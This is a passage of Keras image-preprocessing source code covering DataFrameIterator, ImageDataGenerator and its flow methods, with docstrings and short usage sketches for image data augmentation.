format=self.save_format)
img.save(os.path.join(self.save_to_dir, fname))
batch_x_miscs = [xx[index_array] for xx in self.x_misc]
output = (batch_x if not batch_x_miscs else [batch_x] + batch_x_miscs,)
if self.y is None:
return output[0]
output += (self.y[index_array],)
if self.sample_weight is not None:
output += (self.sample_weight[index_array],)
return output
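# Usage sketch: a `NumpyArrayIterator` is normally created through
# `ImageDataGenerator.flow`. The random arrays below stand in for real
# images and labels.
def _example_numpy_array_iterator():
  x = np.random.random((16, 32, 32, 3)).astype('float32')
  y = np.random.randint(0, 2, size=(16,))
  datagen = ImageDataGenerator(horizontal_flip=True)
  it = datagen.flow(x, y, batch_size=4, shuffle=True, seed=0)
  batch_x, batch_y = next(it)
  return batch_x.shape, batch_y.shape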
def validate_filename(filename, white_list_formats):
"""Check if a filename refers to a valid file.
Args:
filename: String, absolute path to a file
white_list_formats: Tuple of strings, allowed file extensions
Returns:
A boolean value indicating if the filename is valid or not
"""
return (filename.lower().endswith(white_list_formats) and
os.path.isfile(filename))
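# Usage sketch: `validate_filename` accepts only existing files whose
# extension is in the given whitelist (a tuple, as required by
# `str.endswith`). The path below is hypothetical.
def _example_validate_filename():
  white_list_formats = ('png', 'jpg', 'jpeg', 'bmp')
  return validate_filename('/tmp/example.png', white_list_formats)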
class DataFrameIterator(BatchFromFilesMixin, Iterator):
"""Iterator capable of reading images from a directory on disk as a dataframe.
Args:
dataframe: Pandas dataframe containing the filepaths relative to
`directory` (or absolute paths if `directory` is None) of the images in
a string column. It should include other column/s depending on the
`class_mode`:
- if `class_mode` is `"categorical"` (default value) it must include
the `y_col` column with the class/es of each image. Values in the
column can be string/list/tuple if a single class or list/tuple if
multiple classes.
- if `class_mode` is `"binary"` or `"sparse"` it must include the given
`y_col` column with class values as strings.
- if `class_mode` is `"raw"` or `"multi_output"` it should contain the
columns specified in `y_col`.
- if `class_mode` is `"input"` or `None` no extra column is needed.
directory: string, path to the directory to read images from. If `None`,
data in `x_col` column should be absolute paths.
image_data_generator: Instance of `ImageDataGenerator` to use for random
transformations and normalization. If None, no transformations and
normalizations are made.
x_col: string, column in `dataframe` that contains the filenames (or
absolute paths if `directory` is `None`).
y_col: string or list, column/s in `dataframe` that has the target data.
weight_col: string, column in `dataframe` that contains the sample
weights. Default: `None`.
target_size: tuple of integers, dimensions to resize input images to.
color_mode: One of `"rgb"`, `"rgba"`, `"grayscale"`. Color mode to read
images.
classes: Optional list of strings, classes to use (e.g. `["dogs",
"cats"]`). If None, all classes in `y_col` will be used.
class_mode: one of "binary", "categorical", "input", "multi_output",
"raw", "sparse" or None. Default: "categorical".
Mode for yielding the targets:
- `"binary"`: 1D numpy array of binary labels,
- `"categorical"`: 2D numpy array of one-hot encoded labels. Supports
multi-label output.
- `"input"`: images identical to input images (mainly used to work
with autoencoders),
- `"multi_output"`: list with the values of the different columns,
- `"raw"`: numpy array of values in `y_col` column(s),
- `"sparse"`: 1D numpy array of integer labels, - `None`, no targets
are returned (the generator will only yield batches of image data,
which is useful to use in `model.predict()`).
batch_size: Integer, size of a batch.
shuffle: Boolean, whether to shuffle the data between epochs.
seed: Random seed for data shuffling.
data_format: String, one of `channels_first`, `channels_last`.
save_to_dir: Optional directory where to save the pictures being yielded,
in a viewable format. This is useful for visualizing the random
transformations being applied, for debugging purposes.
save_prefix: String prefix to use for saving sample images (if
`save_to_dir` is set).
save_format: Format to use for saving sample images (if `save_to_dir` is
set).
subset: Subset of data (`"training"` or `"validation"`) if
validation_split is set in ImageDataGenerator.
interpolation: Interpolation method used to resample the image if the
target size is different from that of the loaded image. Supported
methods are "nearest", "bilinear", and "bicubic". If PIL version 1.1.3
or newer is installed, "lanczos" is also supported. If PIL version 3.4.0
or newer is installed, "box" and "hamming" are also supported. By
default, "nearest" is used.
keep_aspect_ratio: Boolean, whether to resize images to a target size
without aspect ratio distortion. The image is cropped in the center
with target aspect ratio before resizing.
dtype: Dtype to use for the generated arrays.
validate_filenames: Boolean, whether to validate image filenames in
`x_col`. If `True`, invalid images will be ignored. Disabling this
option can lead to speed-up in the instantiation of this class. Default:
`True`.
"""
allowed_class_modes = {
'binary', 'categorical', 'input', 'multi_output', 'raw', 'sparse', None
}
def __init__(self,
dataframe,
directory=None,
image_data_generator=None,
x_col='filename',
y_col='class',
weight_col=None,
target_size=(256, 256),
color_mode='rgb',
classes=None,
class_mode='categorical',
batch_size=32,
shuffle=True,
seed=None,
data_format='channels_last',
save_to_dir=None,
save_prefix='',
save_format='png',
subset=None,
interpolation='nearest',
keep_aspect_ratio=False,
dtype='float32',
validate_filenames=True):
super().set_processing_attrs(image_data_generator, target_size, color_mode,
data_format, save_to_dir, save_prefix,
save_format, subset, interpolation,
keep_aspect_ratio)
df = dataframe.copy()
self.directory = directory or ''
self.class_mode = class_mode
self.dtype = dtype
# check that inputs match the required class_mode
self._check_params(df, x_col, y_col, weight_col, classes)
if validate_filenames: # check which image files are valid and keep them
df = self._filter_valid_filepaths(df, x_col)
if class_mode not in ['input', 'multi_output', 'raw', None]:
df, classes = self._filter_classes(df, y_col, classes)
num_classes = len(classes)
# build an index of all the unique classes
self.class_indices = dict(zip(classes, range(len(classes))))
# retrieve only training or validation set
if self.split:
num_files = len(df)
start = int(self.split[0] * num_files)
stop = int(self.split[1] * num_files)
df = df.iloc[start:stop, :]
# get labels for each observation
if class_mode not in ['input', 'multi_output', 'raw', None]:
self.classes = self.get_classes(df, y_col)
self.filenames = df[x_col].tolist()
self._sample_weight = df[weight_col].values if weight_col else None
if class_mode == 'multi_output':
self._targets = [np.array(df[col].tolist()) for col in y_col]
if class_mode == 'raw':
self._targets = df[y_col].values
self.samples = len(self.filenames)
validated_string = 'validated' if validate_filenames else 'non-validated'
if class_mode in ['input', 'multi_output', 'raw', None]:
print(f'Found {self.samples} {validated_string} image filenames.')
else:
print(f'Found {self.samples} {validated_string} image filenames '
f'belonging to {num_classes} classes.')
self._filepaths = [
os.path.join(self.directory, fname) for fname in self.filenames
]
super().__init__(self.samples, batch_size, shuffle, seed)
def _check_params(self, df, x_col, y_col, weight_col, classes):
# check class mode is one of the currently supported
if self.class_mode not in self.allowed_class_modes:
raise ValueError('Invalid class_mode: {}; expected one of: {}'.format(
self.class_mode, self.allowed_class_modes))
# check that y_col has several column names if class_mode is multi_output
if (self.class_mode == 'multi_output') and not isinstance(y_col, list):
raise TypeError(
'If class_mode="{}", y_col must be a list. Received {}.'.format(
self.class_mode,
type(y_col).__name__))
# check that filenames/filepaths column values are all strings
if not all(df[x_col].apply(lambda x: isinstance(x, str))):
raise TypeError(
'All values in column x_col={} must be strings.'.format(x_col))
# check labels are string if class_mode is binary or sparse
if self.class_mode in {'binary', 'sparse'}:
if not all(df[y_col].apply(lambda x: isinstance(x, str))):
raise TypeError('If class_mode="{}", y_col="{}" column '
'values must be strings.'.format(
self.class_mode, y_col))
# check that if binary there are only 2 different classes
if self.class_mode == 'binary':
if classes:
classes = set(classes)
if len(classes) != 2:
raise ValueError('If class_mode="binary" there must be 2 '
'classes. {} class/es were given.'.format(
len(classes)))
elif df[y_col].nunique() != 2:
raise ValueError('If class_mode="binary" there must be 2 classes. '
'Found {} classes.'.format(df[y_col].nunique()))
# check values are string, list or tuple if class_mode is categorical
if self.class_mode == 'categorical':
types = (str, list, tuple)
if not all(df[y_col].apply(lambda x: isinstance(x, types))):
raise TypeError('If class_mode="{}", y_col="{}" column '
'values must be type string, list or tuple.'.format(
self.class_mode, y_col))
# raise warning if classes are given but will be unused
if classes and self.class_mode in {'input', 'multi_output', 'raw', None}:
warnings.warn(
'`classes` will be ignored given the class_mode="{}"'.format(
self.class_mode))
# check that if weight column that the values are numerical
if weight_col and not issubclass(df[weight_col].dtype.type, np.number):
raise TypeError(
'Column weight_col={} must be numeric.'.format(weight_col))
def get_classes(self, df, y_col):
labels = []
for label in df[y_col]:
if isinstance(label, (list, tuple)):
labels.append([self.class_indices[lbl] for lbl in label])
else:
labels.append(self.class_indices[label])
return labels
@staticmethod
def _filter_classes(df, y_col, classes):
df = df.copy()
def remove_classes(labels, classes):
if isinstance(labels, (list, tuple)):
labels = [cls for cls in labels if cls in classes]
return labels or None
elif isinstance(labels, str):
return labels if labels in classes else None
else:
raise TypeError(
'Expect string, list or tuple but found {} in {} column '.format(
type(labels), y_col))
if classes:
# prepare for membership lookup
classes = list(collections.OrderedDict.fromkeys(classes).keys())
df[y_col] = df[y_col].apply(lambda x: remove_classes(x, classes))
else:
classes = set()
for v in df[y_col]:
if isinstance(v, (list, tuple)):
classes.update(v)
else:
classes.add(v)
classes = sorted(classes)
return df.dropna(subset=[y_col]), classes
def _filter_valid_filepaths(self, df, x_col):
"""Keep only dataframe rows with valid filenames.
Args:
df: Pandas dataframe containing filenames in a column
x_col: string, column in `df` that contains the filenames or filepaths
Returns:
absolute paths to image files
"""
filepaths = df[x_col].map(lambda fname: os.path.join(self.directory, fname))
mask = filepaths.apply(validate_filename, args=(self.white_list_formats,))
n_invalid = (~mask).sum()
if n_invalid:
warnings.warn('Found {} invalid image filename(s) in x_col="{}". '
'These filename(s) will be ignored.'.format(
n_invalid, x_col))
return df[mask]
@property
def filepaths(self):
return self._filepaths
@property
def labels(self):
if self.class_mode in {'multi_output', 'raw'}:
return self._targets
else:
return self.classes
@property
def sample_weight(self):
return self._sample_weight
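# Usage sketch: a `DataFrameIterator` is normally created through
# `ImageDataGenerator.flow_from_dataframe`. The dataframe and paths below are
# hypothetical, and pandas is assumed to be installed; `validate_filenames`
# is disabled here because the listed files do not exist on disk.
def _example_dataframe_iterator():
  import pandas as pd
  df = pd.DataFrame({'filename': ['cat1.png', 'dog1.png'],
                     'class': ['cat', 'dog']})
  datagen = ImageDataGenerator(rescale=1. / 255)
  return datagen.flow_from_dataframe(
      df, directory='data/images', x_col='filename', y_col='class',
      target_size=(64, 64), class_mode='categorical', batch_size=2,
      validate_filenames=False)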
def flip_axis(x, axis):
x = np.asarray(x).swapaxes(axis, 0)
x = x[::-1, ...]
x = x.swapaxes(0, axis)
return x
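# Usage sketch: `flip_axis` reverses an array along one axis; it is what
# implements the horizontal/vertical flips applied by `apply_transform`.
def _example_flip_axis():
  img = np.arange(6).reshape((2, 3, 1))  # (rows, cols, channels)
  return flip_axis(img, axis=1)[:, :, 0]  # columns mirrored left-right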
@keras_export('keras.preprocessing.image.ImageDataGenerator')
class ImageDataGenerator():
"""Generate batches of tensor image data with real-time data augmentation.
Warning: `tf.keras.preprocessing.image.ImageDataGenerator` is not recommended
for new code. Prefer loading images with
`tf.keras.utils.image_dataset_from_directory` and transforming the output
`tf.data.Dataset` with preprocessing layers. For more information, see the
tutorials for [loading images](
https://www.tensorflow.org/tutorials/load_data/images) and
[augmenting images](
https://www.tensorflow.org/tutorials/images/data_augmentation), as well as
the [preprocessing layer guide](
https://www.tensorflow.org/guide/keras/preprocessing_layers).
The data will be looped over (in batches).
Args:
featurewise_center: Boolean. Set input mean to 0 over the dataset,
feature-wise.
samplewise_center: Boolean. Set each sample mean to 0.
featurewise_std_normalization: Boolean. Divide inputs by std of the
dataset, feature-wise.
samplewise_std_normalization: Boolean. Divide each input by its std.
zca_epsilon: epsilon for ZCA whitening. Default is 1e-6.
zca_whitening: Boolean. Apply ZCA whitening.
rotation_range: Int. Degree range for random rotations.
width_shift_range: Float, 1-D array-like or int
- float: fraction of total width, if < 1, or pixels if >= 1.
- 1-D array-like: random elements from the array.
- int: integer number of pixels from interval `(-width_shift_range,
+width_shift_range)`. With `width_shift_range=2` possible values
are integers `[-1, 0, +1]`, same as with `width_shift_range=[-1, 0,
+1]`, while with `width_shift_range=1.0` possible values are floats
in the interval [-1.0, +1.0).
height_shift_range: Float, 1-D array-like or int
- float: fraction of total height, if < 1, or pixels if >= 1.
- 1-D array-like: random elements from the array.
- int: integer number of pixels from interval `(-height_shift_range,
+height_shift_range)`. With `height_shift_range=2` possible values
are integers `[-1, 0, +1]`, same as with `height_shift_range=[-1, 0,
+1]`, while with `height_shift_range=1.0` possible values are floats
in the interval [-1.0, +1.0).
brightness_range: Tuple or list of two floats. Range for picking a
brightness shift value from.
shear_range: Float. Shear Intensity (Shear angle in counter-clockwise
direction in degrees)
zoom_range: Float or [lower, upper]. Range for random zoom. If a float,
`[lower, upper] = [1-zoom_range, 1+zoom_range]`.
channel_shift_range: Float. Range for random channel shifts.
fill_mode: One of {"constant", "nearest", "reflect" or "wrap"}. Default is
'nearest'. Points outside the boundaries of the input are filled
according to the given mode:
- 'constant': kkkkkkkk|abcd|kkkkkkkk (cval=k)
- 'nearest': aaaaaaaa|abcd|dddddddd
- 'reflect': abcddcba|abcd|dcbaabcd
- 'wrap': abcdabcd|abcd|abcdabcd
cval: Float or Int. Value used for points outside the boundaries when
`fill_mode = "constant"`.
horizontal_flip: Boolean. Randomly flip inputs horizontally.
vertical_flip: Boolean. Randomly flip inputs vertically.
rescale: rescaling factor. Defaults to None. If None or 0, no rescaling is
applied, otherwise we multiply the data by the value provided (after
applying all other transformations).
preprocessing_function: function that will be applied on each input. The
function will run after the image is resized and augmented.
The function should take one argument: one image (Numpy tensor with
rank 3), and should output a Numpy tensor with the same shape.
data_format: Image data format, either "channels_first" or
"channels_last". "channels_last" mode means that the images should have
shape `(samples, height, width, channels)`, "channels_first" mode means
that the images should have shape `(samples, channels, height, width)`.
It defaults to the `image_data_format` value found in your Keras config
file at `~/.keras/keras.json`. If you never set it, then it will be
"channels_last".
validation_split: Float. Fraction of images reserved for validation
(strictly between 0 and 1).
dtype: Dtype to use for the generated arrays.
Raises:
ValueError: If the value of the argument `data_format` is other than
`"channels_last"` or `"channels_first"`.
ValueError: If the value of the argument `validation_split` is not
strictly between 0 and 1.
Examples:
Example of using `.flow(x, y)`:
```python
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
y_train = utils.to_categorical(y_train, num_classes)
y_test = utils.to_categorical(y_test, num_classes)
datagen = ImageDataGenerator(
featurewise_center=True,
featurewise_std_normalization=True,
rotation_range=20,
width_shift_range=0.2,
height_shift_range=0.2,
horizontal_flip=True,
validation_split=0.2)
# compute quantities required for featurewise normalization
# (std, mean, and principal components if ZCA whitening is applied)
datagen.fit(x_train)
# fits the model on batches with real-time data augmentation:
model.fit(datagen.flow(x_train, y_train, batch_size=32,
subset='training'),
validation_data=datagen.flow(x_train, y_train,
batch_size=8, subset='validation'),
steps_per_epoch=len(x_train) / 32, epochs=epochs)
# here's a more "manual" example
for e in range(epochs):
print('Epoch', e)
batches = 0
for x_batch, y_batch in datagen.flow(x_train, y_train, batch_size=32):
model.fit(x_batch, y_batch)
batches += 1
if batches >= len(x_train) / 32:
# we need to break the loop by hand because
# the generator loops indefinitely
break
```
Example of using `.flow_from_directory(directory)`:
```python
train_datagen = ImageDataGenerator(
rescale=1./255,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True)
test_datagen = ImageDataGenerator(rescale=1./255)
train_generator = train_datagen.flow_from_directory(
'data/train',
target_size=(150, 150),
batch_size=32,
class_mode='binary')
validation_generator = test_datagen.flow_from_directory(
'data/validation',
target_size=(150, 150),
batch_size=32,
class_mode='binary')
model.fit(
train_generator,
steps_per_epoch=2000,
epochs=50,
validation_data=validation_generator,
validation_steps=800)
```
Example of transforming images and masks together.
```python
# we create two instances with the same arguments
data_gen_args = dict(featurewise_center=True,
featurewise_std_normalization=True,
rotation_range=90,
width_shift_range=0.1,
height_shift_range=0.1,
zoom_range=0.2)
image_datagen = ImageDataGenerator(**data_gen_args)
mask_datagen = ImageDataGenerator(**data_gen_args)
# Provide the same seed and keyword arguments to the fit and flow methods
seed = 1
image_datagen.fit(images, augment=True, seed=seed)
mask_datagen.fit(masks, augment=True, seed=seed)
image_generator = image_datagen.flow_from_directory(
'data/images',
class_mode=None,
seed=seed)
mask_generator = mask_datagen.flow_from_directory(
'data/masks',
class_mode=None,
seed=seed)
# combine generators into one which yields image and masks
train_generator = zip(image_generator, mask_generator)
model.fit(
train_generator,
steps_per_epoch=2000,
epochs=50)
```
"""
def __init__(self,
featurewise_center=False,
samplewise_center=False,
featurewise_std_normalization=False,
samplewise_std_normalization=False,
zca_whitening=False,
zca_epsilon=1e-6,
rotation_range=0,
width_shift_range=0.,
height_shift_range=0.,
brightness_range=None,
shear_range=0.,
zoom_range=0.,
channel_shift_range=0.,
fill_mode='nearest',
cval=0.,
horizontal_flip=False,
vertical_flip=False,
rescale=None,
preprocessing_function=None,
data_format=None,
validation_split=0.0,
interpolation_order=1,
dtype=None):
if data_format is None:
data_format = backend.image_data_format()
if dtype is None:
dtype = backend.floatx()
self.featurewise_center = featurewise_center
self.samplewise_center = samplewise_center
self.featurewise_std_normalization = featurewise_std_normalization
self.samplewise_std_normalization = samplewise_std_normalization
self.zca_whitening = zca_whitening
self.zca_epsilon = zca_epsilon
self.rotation_range = rotation_range
self.width_shift_range = width_shift_range
self.height_shift_range = height_shift_range
self.shear_range = shear_range
self.zoom_range = zoom_range
self.channel_shift_range = channel_shift_range
self.fill_mode = fill_mode
self.cval = cval
self.horizontal_flip = horizontal_flip
self.vertical_flip = vertical_flip
self.rescale = rescale
self.preprocessing_function = preprocessing_function
self.dtype = dtype
self.interpolation_order = interpolation_order
if data_format not in {'channels_last', 'channels_first'}:
raise ValueError('`data_format` should be `"channels_last"` '
'(channel after row and column) or '
'`"channels_first"` (channel before row and column). '
'Received: %s' % data_format)
self.data_format = data_format
if data_format == 'channels_first':
self.channel_axis = 1
self.row_axis = 2
self.col_axis = 3
if data_format == 'channels_last':
self.channel_axis = 3
self.row_axis = 1
self.col_axis = 2
if validation_split and not 0 < validation_split < 1:
raise ValueError('`validation_split` must be strictly between 0 and 1. '
'Received: %s' % validation_split)
self._validation_split = validation_split
self.mean = None
self.std = None
self.zca_whitening_matrix = None
if isinstance(zoom_range, (float, int)):
self.zoom_range = [1 - zoom_range, 1 + zoom_range]
elif (len(zoom_range) == 2 and
all(isinstance(val, (float, int)) for val in zoom_range)):
self.zoom_range = [zoom_range[0], zoom_range[1]]
else:
raise ValueError('`zoom_range` should be a float or '
'a tuple or list of two floats. '
'Received: %s' % (zoom_range,))
if zca_whitening:
if not featurewise_center:
self.featurewise_center = True
warnings.warn('This ImageDataGenerator specifies '
'`zca_whitening`, which overrides '
'setting of `featurewise_center`.')
if featurewise_std_normalization:
self.featurewise_std_normalization = False
warnings.warn('This ImageDataGenerator specifies '
'`zca_whitening` '
'which overrides setting of '
'`featurewise_std_normalization`.')
if featurewise_std_normalization:
if not featurewise_center:
self.featurewise_center = True
warnings.warn('This ImageDataGenerator specifies '
'`featurewise_std_normalization`, '
'which overrides setting of '
'`featurewise_center`.')
if samplewise_std_normalization:
if not samplewise_center:
self.samplewise_center = True
warnings.warn('This ImageDataGenerator specifies '
'`samplewise_std_normalization`, '
'which overrides setting of '
'`samplewise_center`.')
if brightness_range is not None:
if (not isinstance(brightness_range, (tuple, list)) or
len(brightness_range) != 2):
raise ValueError(
'`brightness_range` should be a tuple or list of two floats. '
'Received: %s' % (brightness_range,))
self.brightness_range = brightness_range
def flow(self,
x,
y=None,
batch_size=32,
shuffle=True,
sample_weight=None,
seed=None,
save_to_dir=None,
save_prefix='',
save_format='png',
ignore_class_split=False,
subset=None):
"""Takes data & label arrays, generates batches of augmented data.
Args:
x: Input data. Numpy array of rank 4 or a tuple. If tuple, the first
element should contain the images and the second element another numpy
array or a list of numpy arrays that gets passed to the output without
any modifications. Can be used to feed the model miscellaneous data
along with the images. In case of grayscale data, the channels axis of
the image array should have value 1, in case of RGB data, it should
have value 3, and in case of RGBA data, it should have value 4.
y: Labels.
batch_size: Int (default: 32).
shuffle: Boolean (default: True).
sample_weight: Sample weights.
seed: Int (default: None).
save_to_dir: None or str (default: None). This allows you to optionally
specify a directory to which to save the augmented pictures being
generated (useful for visualizing what you are doing).
save_prefix: Str (default: `''`). Prefix to use for filenames of saved
pictures (only relevant if `save_to_dir` is set).
save_format: one of "png", "jpeg", "bmp", "pdf", "ppm", "gif", "tif",
"jpg" (only relevant if `save_to_dir` is set). Default: "png".
ignore_class_split: Boolean (default: False), ignore difference
in number of classes in labels across train and validation
split (useful for non-classification tasks)
subset: Subset of data (`"training"` or `"validation"`) if
`validation_split` is set in `ImageDataGenerator`.
Returns:
An `Iterator` yielding tuples of `(x, y)`
where `x` is a numpy array of image data
(in the case of a single image input) or a list
of numpy arrays (in the case with
additional inputs) and `y` is a numpy array
of corresponding labels. If 'sample_weight' is not None,
the yielded tuples are of the form `(x, y, sample_weight)`.
If `y` is None, only the numpy array `x` is returned.
Raises:
ValueError: If the value of the argument `subset` is other than
"training" or "validation".
"""
return NumpyArrayIterator(
x,
y,
self,
batch_size=batch_size,
shuffle=shuffle,
sample_weight=sample_weight,
seed=seed,
data_format=self.data_format,
save_to_dir=save_to_dir,
save_prefix=save_prefix,
save_format=save_format,
ignore_class_split=ignore_class_split,
subset=subset,
dtype=self.dtype)
def flow_from_directory(self,
directory,
target_size=(256, 256),
color_mode='rgb',
classes=None,
class_mode='categorical',
batch_size=32,
shuffle=True,
seed=None,
save_to_dir=None,
save_prefix='',
save_format='png',
follow_links=False,
subset=None,
interpolation='nearest',
keep_aspect_ratio=False):
"""Takes the path to a directory & generates batches of augmented data.
Args:
directory: string, path to the target directory. It should contain one
subdirectory per class. Any PNG, JPG, BMP, PPM or TIF images inside
each of the subdirectories directory tree will be included in the
generator. See [this script](
https://gist.github.com/fchollet/0830affa1f7f19fd47b06d4cf89ed44d)
for more details.
target_size: Tuple of integers `(height, width)`, defaults to `(256,
256)`. The dimensions to which all images found will be resized.
color_mode: One of "grayscale", "rgb", "rgba". Default: "rgb". Whether
the images will be converted to have 1, 3, or 4 channels.
classes: Optional list of class subdirectories
(e.g. `['dogs', 'cats']`). Default: None. If not provided, the list
of classes will be automatically inferred from the subdirectory
names/structure under `directory`, where each subdirectory will be
treated as a different class (and the order of the classes, which
will map to the label indices, will be alphanumeric). The
dictionary containing the mapping from class names to class
indices can be obtained via the attribute `class_indices`.
class_mode: One of "categorical", "binary", "sparse",
"input", or None. Default: "categorical".
Determines the type of label arrays that are returned:
- "categorical" will be 2D one-hot encoded labels,
- "binary" will be 1D binary labels,
"sparse" will be 1D integer labels,
- "input" will be images identical
to input images (mainly used to work with autoencoders).
- If None, no labels are returned
(the generator will only yield batches of image data,
which is useful to use with `model.predict()`).
Please note that in case of class_mode None,
the data still needs to reside in a subdirectory
of `directory` for it to work correctly.
batch_size: Size of the batches of data (default: 32).
shuffle: Whether to shuffle the data (default: True) If set to False,
sorts the data in alphanumeric order.
seed: Optional random seed for shuffling and transformations.
save_to_dir: None or str (default: None). This allows you to optionally
specify a directory to which to save the augmented pictures being
generated (useful for visualizing what you are doing).
save_prefix: Str. Prefix to use for filenames of saved pictures (only
relevant if `save_to_dir` is set).
save_format: one of "png", "jpeg", "bmp", "pdf", "ppm", "gif", "tif",
"jpg"
(only relevant if `save_to_dir` is set). Default: "png".
follow_links: Whether to follow symlinks inside
class subdirectories (default: False).
subset: Subset of data (`"training"` or `"validation"`) if
`validation_split` is set in `ImageDataGenerator`.
interpolation: Interpolation method used to resample the image if the
target size is different from that of the loaded image. Supported
methods are `"nearest"`, `"bilinear"`, and `"bicubic"`. If PIL version
1.1.3 or newer is installed, `"lanczos"` is also supported. If PIL
version 3.4.0 or newer is installed, `"box"` and `"hamming"` are also
supported. By default, `"nearest"` is used.
keep_aspect_ratio: Boolean, whether to resize images to a target
size without aspect ratio distortion. The image is cropped in
the center with target aspect ratio before resizing.
Returns:
A `DirectoryIterator` yielding tuples of `(x, y)`
where `x` is a numpy array containing a batch
of images with shape `(batch_size, *target_size, channels)`
and `y` is a numpy array of corresponding labels.
"""
return DirectoryIterator(
directory,
self,
target_size=target_size,
color_mode=color_mode,
keep_aspect_ratio=keep_aspect_ratio,
classes=classes,
class_mode=class_mode,
data_format=self.data_format,
batch_size=batch_size,
shuffle=shuffle,
seed=seed,
save_to_dir=save_to_dir,
save_prefix=save_prefix,
save_format=save_format,
follow_links=follow_links,
subset=subset,
interpolation=interpolation,
dtype=self.dtype)
def flow_from_dataframe(self,
dataframe,
directory=None,
x_col='filename',
y_col='class',
weight_col=None,
target_size=(256, 256),
color_mode='rgb',
classes=None,
class_mode='categorical',
batch_size=32,
shuffle=True,
seed=None,
save_to_dir=None,
save_prefix='',
save_format='png',
subset=None,
interpolation='nearest',
validate_filenames=True,
**kwargs):
"""Takes the dataframe and the path to a directory + generates batches.
The generated batches contain augmented/normalized data.
A simple tutorial can be found [here](
http://bit.ly/keras_flow_from_dataframe).
Args:
dataframe: Pandas dataframe containing the filepaths relative to
`directory` (or absolute paths if `directory` is None) of the
images in a string column. It should include other column/s
depending on the `class_mode`:
- if `class_mode` is `"categorical"` (default value) it must
include the `y_col` column with the class/es of each image.
Values in column can be string/list/tuple if a single class
or list/tuple if multiple classes.
- if `class_mode` is `"binary"` or `"sparse"` it must include
the given `y_col` column with class values as strings.
- if `class_mode` is `"raw"` or `"multi_output"` it should contain
the columns specified in `y_col`.
- if `class_mode` is `"input"` or `None` no extra column is needed.
directory: string, path to the directory to read images from. If `None`,
data in `x_col` column should be absolute paths.
x_col: string, column in `dataframe` that contains the filenames (or
absolute paths if `directory` is `None`).
y_col: string or list, column/s in `dataframe` that has the target data.
weight_col: string, column in `dataframe` that contains the sample
weights. Default: `None`.
target_size: tuple of integers `(height, width)`, default: `(256, 256)`.
The dimensions to which all images found will be resized.
color_mode: one of "grayscale", "rgb", "rgba". Default: "rgb". Whether
the images will be converted to have 1 or 3 color channels.
classes: optional list of classes (e.g. `['dogs', 'cats']`). Default is
None. If not provided, the list of classes will be automatically
inferred from `y_col` (and the order of the classes, which will map to
the label indices, will be alphanumeric). The dictionary containing the mapping from class
names to class indices can be obtained via the attribute
`class_indices`.
class_mode: one of "binary", "categorical", "input", "multi_output",
"raw", sparse" or None. Default: "categorical".
Mode for yielding the targets:
- `"binary"`: 1D numpy array of binary labels,
- `"categorical"`: 2D numpy array of one-hot encoded labels.
Supports multi-label output.
- `"input"`: images identical to input images (mainly used to work
with autoencoders),
- `"multi_output"`: list with the values of the different columns,
- `"raw"`: numpy array of values in `y_col` column(s),
- `"sparse"`: 1D numpy array of integer labels, - `None`, no targets
are returned (the generator will only yield batches of image data,
which is useful to use in `model.predict()`).
batch_size: size of the batches of data (default: 32).
shuffle: whether to shuffle the data (default: True)
seed: optional random seed for shuffling and transformations.
save_to_dir: None or str (default: None). This allows you to optionally
specify a directory to which to save the augmented pictures being
generated (useful for visualizing what you are doing).
save_prefix: str. Prefix to use for filenames of saved pictures (only
relevant if `save_to_dir` is set).
save_format: one of "png", "jpeg", "bmp", "pdf", "ppm", "gif", "tif",
"jpg" (only relevant if `save_to_dir` is set). Default: "png".
subset: Subset of data (`"training"` or `"validation"`) if
`validation_split` is set in `ImageDataGenerator`.
interpolation: Interpolation method used to resample the image if the
target size is different from that of the loaded image. Supported
methods are `"nearest"`, `"bilinear"`, and `"bicubic"`. If PIL version
1.1.3 or newer is installed, `"lanczos"` is also supported. If PIL
version 3.4.0 or newer is installed, `"box"` and `"hamming"` are also
supported. By default, `"nearest"` is used.
validate_filenames: Boolean, whether to validate image filenames in
`x_col`. If `True`, invalid images will be ignored. Disabling this
option can lead to speed-up in the execution of this function.
Defaults to `True`.
**kwargs: legacy arguments for raising deprecation warnings.
Returns:
A `DataFrameIterator` yielding tuples of `(x, y)`
where `x` is a numpy array containing a batch
of images with shape `(batch_size, *target_size, channels)`
and `y` is a numpy array of corresponding labels.
"""
if 'has_ext' in kwargs:
warnings.warn(
'has_ext is deprecated, filenames in the dataframe have '
'to match the exact filenames in disk.', DeprecationWarning)
if 'sort' in kwargs:
warnings.warn(
'sort is deprecated, batches will be created in the '
'same order as the filenames provided if shuffle '
'is set to False.', DeprecationWarning)
if class_mode == 'other':
warnings.warn(
'`class_mode` "other" is deprecated, please use '
'`class_mode` "raw".', DeprecationWarning)
class_mode = 'raw'
if 'drop_duplicates' in kwargs:
warnings.warn(
'drop_duplicates is deprecated, you can drop duplicates '
'by using the pandas.DataFrame.drop_duplicates method.',
DeprecationWarning)
return DataFrameIterator(
dataframe,
directory,
self,
x_col=x_col,
y_col=y_col,
weight_col=weight_col,
target_size=target_size,
color_mode=color_mode,
classes=classes,
class_mode=class_mode,
data_format=self.data_format,
batch_size=batch_size,
shuffle=shuffle,
seed=seed,
save_to_dir=save_to_dir,
save_prefix=save_prefix,
save_format=save_format,
subset=subset,
interpolation=interpolation,
validate_filenames=validate_filenames,
dtype=self.dtype)
def standardize(self, x):
"""Applies the normalization configuration in-place to a batch of inputs.
`x` is changed in-place since the function is mainly used internally
to standardize images and feed them to your network. Creating a copy
of `x` instead would have a significant performance cost. If you want
to apply this method without changing the input in-place, call it on a
copy beforehand:
standardize(np.copy(x))
Args:
x: Batch of inputs to be normalized.
Returns:
The inputs, normalized.
"""
if self.preprocessing_function:
x = self.preprocessing_function(x)
if self.rescale:
x *= self.rescale
if self.samplewise_center:
x -= np.mean(x, keepdims=True)
if self.samplewise_std_normalization:
x /= (np.std(x, keepdims=True) + 1e-6)
if self.featurewise_center:
if self.mean is not None:
x -= self.mean
else:
warnings.warn('This ImageDataGenerator specifies '
'`featurewise_center`, but it hasn\'t '
'been fit on any training data. Fit it '
'first by calling `.fit(numpy_data)`.')
if self.featurewise_std_normalization:
if self.std is not None:
x /= (self.std + 1e-6)
else:
warnings.warn('This ImageDataGenerator specifies '
'`featurewise_std_normalization`, '
'but it hasn\'t '
'been fit on any training data. Fit it '
'first by calling `.fit(numpy_data)`.')
if self.zca_whitening:
if self.zca_whitening_matrix is not None:
flat_x = x.reshape(-1, np.prod(x.shape[-3:]))
white_x = flat_x @ self.zca_whitening_matrix
x = np.reshape(white_x, x.shape)
else:
